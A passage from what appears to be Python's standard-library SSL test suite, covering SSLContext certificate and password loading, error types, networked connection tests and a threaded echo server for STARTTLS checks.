bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23,
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23,
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_protocols.append(self.sslconn.selected_npn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
